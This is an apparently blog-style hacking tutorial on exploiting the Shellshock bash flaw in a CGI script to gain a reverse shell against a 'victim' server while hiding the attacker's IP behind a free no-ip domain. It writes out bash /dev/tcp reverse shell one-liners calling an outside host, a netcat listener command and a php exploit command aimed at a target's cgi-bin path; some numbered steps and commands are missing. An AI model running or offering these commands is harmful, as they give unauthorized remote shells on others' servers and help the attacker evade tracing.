Today, we’re going to exploit a BASH Shellshock Vulnerability successfully and getting a reverse shell while protecting yourself and hiding your IP Address.
Who is vulnerable to shellshock??:
3- Download exploit for shellshock from here
noip Domain for anonymity:
1- Visit noip.com and register an account.
2- Now go in your account and go in Manager Hosts. There add a free domain name with your public IP.
/dev/tcp Linux Native Reverse Shell:
We will try to use the /dev/tcp for reverse shell because every linux system have it.
/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1
/bin/bash -i >& /dev/tcp/UR_PUBLIC_IP/5555 0>&1
NOTE: forward your port 5555 for your LAN IP otherwise it won’t work for you.
Verification of vulnerable victim:
Now type the following command to run this exploit.
If you see command sent to server then it means server is receiving our command but it can’t send back any response.
Netcat Reverse Shell Handler:
Now we need to run netcat listening on a port so that we may get a reverse shell.So, start a netcat listening on ur system with this command:
nc -lp 4444 -vv
-vv is used for verbosity and more information
-l is for listening with netcat
-p is used for a custom port on which we want to listen
Now we are all set, just run the following command and wait untill you receive a reverse shell on your netcat reverse handler.
php bash_mod_cgi_script.php -u http://targetdomain.com/cgi-bin/wslb.sh -c “/bin/bash -i >& /dev/tcp/logon.myftp.org/5555 0>&1”